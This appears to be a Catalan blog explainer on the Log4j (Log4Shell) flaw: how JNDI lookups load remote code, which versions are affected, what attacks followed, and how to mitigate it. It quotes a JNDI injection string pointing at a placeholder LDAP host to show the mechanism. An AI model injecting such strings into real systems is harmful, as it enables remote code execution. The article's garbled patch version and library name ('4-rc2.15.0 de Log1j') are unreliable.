Taula de continguts[Amaga][Espectacle]
A finals de novembre de 2021, vam descobrir una amenaça important per a la ciberseguretat. Aquesta explotació podria afectar milions de sistemes informàtics a tot el món.
Aquesta és una guia sobre la vulnerabilitat Log4j i com un error de disseny passat per alt va deixar més del 90% dels serveis informàtics del món oberts a atacs.
Apache Log4j és una utilitat de registre de codi obert basada en Java desenvolupada per l'Apache Software Foundation. Escrita originalment per Ceki Gülcü l'any 2001, ara forma part d'Apache Logging Services, un projecte de l'Apache Software Foundation.
Les empreses d'arreu del món utilitzen la biblioteca Log4j per habilitar el registre de les seves aplicacions. De fet, la biblioteca de Java és tan omnipresent que la podeu trobar a aplicacions d'Amazon, Microsoft, Google i més.
El protagonisme de la biblioteca significa que qualsevol defecte potencial en el codi podria deixar milions d'ordinadors oberts a la pirateria. El 24 de novembre de 2021, a seguretat al núvol un investigador que treballa per a Alibaba va descobrir un defecte terrible.
La vulnerabilitat Log4j, també coneguda com a Log4Shell, va existir desapercebuda des del 2013. La vulnerabilitat va permetre que els actors maliciosos executessin codi als sistemes afectats que executaven Log4j. Es va donar a conèixer públicament el 9 de desembre de 2021
Els experts de la indústria anomenen el defecte de Log4Shell vulnerabilitat més gran de la memòria recent.
La setmana següent a la publicació de la vulnerabilitat, els equips de ciberseguretat van detectar milions d'atacs. Alguns investigadors fins i tot van observar una taxa de més de cent atacs per minut.
Com funciona?
Per entendre per què Log4Shell és tan perillós, hem d'entendre de què és capaç.
La vulnerabilitat Log4Shell permet l'execució de codi arbitrari, la qual cosa significa bàsicament que un atacant pot executar qualsevol comanda o codi en una màquina objectiu.
Com ho aconsegueix?
En primer lloc, hem d'entendre què és el JNDI.
El Java Naming and Directory Interface (JNDI) és un servei Java que permet als programes Java descobrir i buscar dades i recursos mitjançant un nom. Aquests serveis de directoris són importants perquè proporcionen un conjunt organitzat de registres perquè els desenvolupadors puguin fer referència fàcilment quan creen aplicacions.
El JNDI pot utilitzar diversos protocols per accedir a un directori determinat. Un d'aquests protocols és el Lightweight Directory Access Protocol, o LDAP.
En registrar una cadena, log4j realitza substitucions de cadenes quan troben expressions de la forma ${prefix:name}
.
Per exemple, Text: ${java:version}
es pot registrar com a Text: Java versió 1.8.0_65. Aquest tipus de substitucions són habituals.
També podem tenir expressions com Text: ${jndi:ldap://example.com/file}
que utilitza el sistema JNDI per carregar un objecte Java des d'una URL mitjançant el protocol LDAP.
Això carrega efectivament les dades procedents d'aquest URL a la màquina. Qualsevol pirata informàtic potencial pot allotjar codi maliciós en una URL pública i esperar que les màquines que utilitzen Log4j el registren.
Com que el contingut dels missatges de registre conté dades controlades per l'usuari, els pirates informàtics poden inserir les seves pròpies referències JNDI que apunten als servidors LDAP que controlen. Aquests servidors LDAP poden estar plens d'objectes Java maliciosos que el JNDI pot executar mitjançant la vulnerabilitat.
El que empitjora això és que no importa si l'aplicació és del costat del servidor o del costat del client.
Mentre hi hagi una manera perquè el registrador llegeixi el codi maliciós de l'atacant, l'aplicació encara està oberta a explotacions.
Qui està afectat?
La vulnerabilitat afecta tots els sistemes i serveis que utilitzen APache Log4j, amb les versions 2.0 fins a la 2.14.1 inclosa.
Diversos experts en seguretat aconsellen que la vulnerabilitat pot afectar diverses aplicacions que utilitzen Java.
El defecte es va descobrir per primera vegada al videojoc Minecraft, propietat de Microsoft. Microsoft ha instat als seus usuaris a actualitzar el seu programari Minecraft de l'edició Java per evitar qualsevol risc.
Jen Easterly, la directora de Ciberseguretat i Agència de Seguretat de la Infraestructura (CISA) diu que els venedors tenen un gran responsabilitat per evitar que els usuaris finals d'actors maliciosos explotin aquesta vulnerabilitat.
"Els venedors també haurien de comunicar-se amb els seus clients per assegurar-se que els usuaris finals sàpiguen que el seu producte conté aquesta vulnerabilitat i haurien de prioritzar les actualitzacions de programari".
Sembla que els atacs ja han començat. Symantec, una empresa que proporciona programari de ciberseguretat, ha observat un nombre variat de sol·licituds d'atac.
Aquests són alguns exemples dels tipus d'atacs que els investigadors han detectat:
- botnets
Les botnets són una xarxa d'ordinadors que estan sota el control d'una sola part atacant. Ajuden a realitzar atacs DDoS, robar dades i altres estafes. Els investigadors van observar la botnet Muhstik en scripts d'intèrpret d'ordres descarregats de l'explotació Log4j.
- Troià XMRig Miner
XMRig és un miner de criptomoneda de codi obert que utilitza CPU per extreure el testimoni Monero. Els ciberdelinqüents poden instal·lar XMRig als dispositius de les persones perquè puguin utilitzar la seva potència de processament sense el seu coneixement.
- Khonsari Ransomware
El ransomware fa referència a una forma de programari maliciós dissenyat per xifrar fitxers en un ordinador. Aleshores, els atacants poden exigir el pagament a canvi de donar accés als fitxers xifrats. Els investigadors van descobrir el ransomware Khonsari als atacs Log4Shell. S'orienten als servidors de Windows i fan ús del framework .NET.
Què passa després?
Els experts prediuen que pot trigar mesos o fins i tot anys a solucionar completament el caos provocat per la vulnerabilitat Log4J.
Aquest procés implica l'actualització de tots els sistemes afectats amb una versió pegada. Fins i tot si tots aquests sistemes estan pegats, encara hi ha l'amenaça de possibles portes del darrere que els pirates informàtics ja han afegit a la finestra que els servidors estaven oberts per atacar.
Molts solucions i mitigacions existeixen per evitar que les aplicacions siguin explotades per aquest error. La nova versió 4-rc2.15.0 de Log1j va canviar diversos paràmetres per mitigar aquesta vulnerabilitat.
Totes les funcions que utilitzen JNDI es desactivaran de manera predeterminada i també s'han restringit les cerques remotes. Desactivar la funció de cerca a la configuració de Log4j ajudarà a reduir el risc de possibles exploits.
Fora de Log4j, encara hi ha la necessitat d'un pla més ampli per evitar explotacions de codi obert.
A principis de maig, la Casa Blanca va publicar un ordre executiu que pretenia millorar la ciberseguretat nacional. Incloïa una disposició per a una llista de materials de programari (SBOM) que era essencialment un document formal que contenia una llista de tots els elements necessaris per crear l'aplicació.
Això inclou peces com ara el de codi obert paquets, dependències i API utilitzats per al desenvolupament. Tot i que la idea dels SBOM és útil per a la transparència, realment ajudarà al consumidor?
Actualitzar les dependències pot ser massa molest. Les empreses només poden optar per pagar les multes en lloc de córrer el risc de perdre temps addicional per trobar paquets alternatius. Potser aquests SBOM només seran útils si són abast es limita encara més.
Conclusió
El problema Log4j és més que un problema tècnic per a les organitzacions.
Els líders empresarials han de ser conscients dels possibles riscos que es poden produir quan els seus servidors, productes o serveis es basen en codi que ells mateixos no mantenen.
Confiar en aplicacions de codi obert i de tercers sempre comporta un cert risc. Les empreses haurien de plantejar-se elaborar estratègies de mitigació de riscos abans que surtin a la llum noves amenaces.
Gran part del web es basa en programari de codi obert mantingut per milers de voluntaris a tot el món.
Si volem que el web sigui un lloc segur, els governs i les corporacions haurien d'invertir en finançar esforços de codi obert i agències de ciberseguretat com ara CISA.
Deixa un comentari